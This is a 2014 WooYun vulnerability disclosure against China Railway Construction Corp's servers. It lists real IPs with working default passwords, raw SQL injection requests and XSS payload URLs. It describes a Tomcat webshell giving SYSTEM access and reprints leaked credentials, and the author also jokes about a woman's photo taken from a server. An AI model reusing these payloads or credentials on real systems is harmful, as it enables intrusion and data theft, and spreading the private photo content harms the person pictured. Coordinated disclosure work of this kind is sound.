当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-084591

漏洞标题:弱口令引起的中国铁建的血案(C段&getshell&大量数据)

相关厂商:中国铁建

漏洞作者: sm0nk

提交时间:2014-11-25 15:58

修复时间:2015-01-09 16:00

公开时间:2015-01-09 16:00

漏洞类型:服务弱口令

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-11-25: 细节已通知厂商并且等待厂商处理中
2014-11-28: 厂商已经确认,细节仅向厂商公开
2014-12-08: 细节向核心白帽子及相关领域专家公开
2014-12-18: 细节向普通白帽子公开
2014-12-28: 细节向实习白帽子公开
2015-01-09: 细节向公众公开

简要描述:

最近中铁建太火啦
中国铁建股份有限公司整个C段。问题灰常多,灰常严重
中国中铁与中国铁建 有什么区别?
中国中铁全称为中国铁路工程总公司,是国有特大型以铁路建筑为主的建筑集团,总部设在北京,是世界500强企业,下属中铁1—10局,(其中中铁1—5局、中铁大桥局、中铁隧道局是建国后成立的,都是原来铁道部的工程局,中铁6—10局是近几年从铁路局所属的工程总公司分离出来和从系统内其它工程局抽出部分子公司划归组建的新局)2002年企业改制前隶属铁道部,现划归国务院国资委管理;
中国铁建全称为中国铁道建筑总公司,1984年元月前是中国人民解放军铁道兵司令部,是1949年解放前期随着战争后勤保障及国家铁路建设的需要从野战部队改编出来战功卓著的部队,参加过抗日战争、解放战争、抗美援朝、抗美援越、对越自卫还击等战争,总部在北京,随着历史使命的需要,1984年国家百万大裁军中集体转业并入铁道部,部队时期从15个师精减整编后所属的10个师分别改为铁道部第十一至二十工程局,即2002年改制后现在所称的中铁十一至中铁二十局,是铁道兵改过来的,是国有特大型以铁路建筑为主集设计、制造、施工、经营一体化跨国性建筑航母,是世界500强企业,全球225家最大建筑承包商排名第一,现归国务院国资委管理,现所属的中铁十一至中铁二十五局,其中的中铁二十一至中铁二十五局5个局是近几年从铁路局的工程总公司及系统内的工程子公司抽调部分单位组建的新局划转中国铁建管理的,现在的中国铁建还包括中国土木工程总公司等单位。

详细说明:

http://www.crcc.cn/ 中国铁建股份有限公司 IP地址是[1.202.224.58]
漏洞类型分为
1.弱口令类
1.1 应用弱口令
1.2 FTP 弱口令
1.3 数据库弱口令(DS.中铁建业务库)
2.SQL注入类
2.1中国铁建企业生产计划统计管理系统 登录界面注入
2.2 中国铁建股份有限公司电子商务平台 注入
3.挂马getshell,内网渗透
4.XSS
5.信息泄漏

漏洞证明:

1.弱口令类
1.1 应用弱口令
crcc金蝶人力系统 tomcat root root
http://1.202.224.11:6666/

1.jpg


1.2 FTP弱口令
1.202.224.52 ftp ftp
1.202.224.52 anonymous anonymous
1.202.224.21 ftp ftp FTP
1.202.224.21 anonymous anonymous
1.202.224.21 anonymous [email protected]

ftp1.jpg


ftp2.jpg


1.202.224.21这个服务器上的照片,来个清纯妹子的照片提下神(ps:照片的体积好大,高清,肯定是好相机)

meizi.jpg


1.3 数据库弱口令
1.202.224.72 admin admin MySQL
1.202.224.14 SYS admin ORACLE
1.202.224.14 DBSNMP admin ORACLE
DS.中铁建业务库

SQL1.jpg


SQL2.jpg


2.SQL注入
2.1 中国铁建企业生产计划统计管理系统 登录界面注入

POST /index.aspx HTTP/1.1
Host: 1.202.224.21
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://1.202.224.21/index.aspx
Cookie: ASP.NET_SessionId=cv2dcbt2zz1tqozmgasgff2p
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 313
__VIEWSTATE=%2FwEPDwUKLTU2MTI1MjQwNWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMY2clktYMvsQfqnmIU6bc48TSykQrQ0T%2FA1NKozwafC8&__EVENTVALIDATION=%2FwEWBAKS%2Ban1AQLz1uPtBAL65IDYBwLSwpnTCAe1mU%2FEsioCIXXti6BWvTStjZwnogwWSs0HotBcBdih&txtyhmc=wooyun&txtyhkl=wooyun&ImageButton1.x=49&ImageButton1.y=14


inj1.jpg


2.2 中国铁建股份有限公司电子商务平台 注入

POST /b2b/web/two/indexinfoAction.do?actionType=showOneProduct&dwbm=00100000370&sbwzly=0&xh=-1%20OR%203*2*1%3d6%20AND%20000923%3d000923%20--%20 HTTP/1.1
Content-Length: 31
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://ec.crcc.cn:8000/logonAction.do
Cookie: JSESSIONID=9SgbJyBVRbwbFg1Z7yfgDjxMPnmVHtyvHmz8bLPQxNtNJ18GwTd5!-324169520
Host: ec.crcc.cn:8000
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
currpage=1&dwmc=e&wzbm=e&wzmc=e


3.挂马
结合弱口令部署war包
http://1.202.224.11:6666/job/2010.jsp

Ma1.jpg


系统权限
C:\Tomcat 6.0\webapps\manager\> whoami
nt authority\system
创建管理员帐号,远程桌面直接过去

mstsc-11.jpg


翻翻远程主机的FTP

10.1.6.10ftp01.jpg


4.XSS跨站脚本编制
4.1XSS01
中国铁建股份有限公司电子商务平台
http://ec.crcc.cn:8000/sbgl/CommonQueryAction.do?method=queryDocTypeAction'%22()%26%25<ScRiPt%20>prompt(928142)</ScRiPt>
http://ec.crcc.cn:8000/fileuploadAction.do?fjbh=2011080951<ScRiPt%20>prompt(962237)</ScRiPt>&fjmc=%C8%AB%D2%BA%D1%B9%CB%AB%C7%FD%B6%AF%D7%D4%D0%D0%CA%BD%D5%F1%B6%AF
%D1%B9%C2%B7%BB%FA.png&fjml=/fileuploadsave/SCGHCP/&method=downLoadBlob
http://ec.crcc.cn:8000/b2b/web/indexinfoAction.do?actionType=showMore&currpage=1<ScRiPt%20>prompt(953248)</ScRiPt>&xxposition=01
http://ec.crcc.cn:8000//b2b/web/fileuploadAction.do?fileName=%B9%D8%D3%DA%CA%D5%C8%A1%D6%D0%B9%FA%CC%FA%BD%A8%B5%E7%D7%D3%C9%CC%CE%F1%C6%BD%CC%A8%CA
%B9%D3%C3%B7%D1%B5%C4%CD%A8%D6%AA-2014.pdf&fileType=application/pdf&fjbh=20141002177<ScRiPt%20>prompt(922175)</ScRiPt>&fjml=/fileuploadsave/SCFBXX/&method=downLoad

xss1.jpg


4.2XSS02
http://1.202.224.46/login.jsp
autotest=N%22%20onmouseover%3dprompt(997519)%20bad%3d%22&height=&iecache=Y&width=

in.jpg


xss02.jpg


4.3 XSS03
中国铁建蓝信系统
http://lanxin.crcc.cn/pc/exam/inputMobile.do
id=43&keyword=1'%22()%26%25<ScRiPt%20>prompt(912604)</ScRiPt>

xss03.jpg


5.敏感信息泄漏
5.1 1.202.224.11
imp gzwyjkh/kingdee@orcl_21 file=d:/gzw_V20090629.dmp full=y;
@echo off net use \\10.1.6.21 "2121kd!" /user:"administrator" xcopy E:\app\Administrator\admin\orcl\dpdump \\10.1.6.21\backup22 /e /h /i /y net use \\10.1.6.21 /delete
备份文件

info01.jpg


5.2 蓝信
http://lanxin.crcc.cn/pc/ckeditor/.htaccess
5.3. 数据库的敏感信息
通过翻表又获得1.202.224.72 Oracle的帐号密码 auditdb auditdb

dbinfo01.jpg


dbinfo02.jpg


dbinfo03.jpg


修复方案:

1.增强密码及安全意识
2.过滤字符
3.删webshell
4.XSS 同样过滤
5.注意加密存储

版权声明:转载请注明来源 sm0nk@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-11-28 17:32

厂商回复:

最新状态:

暂无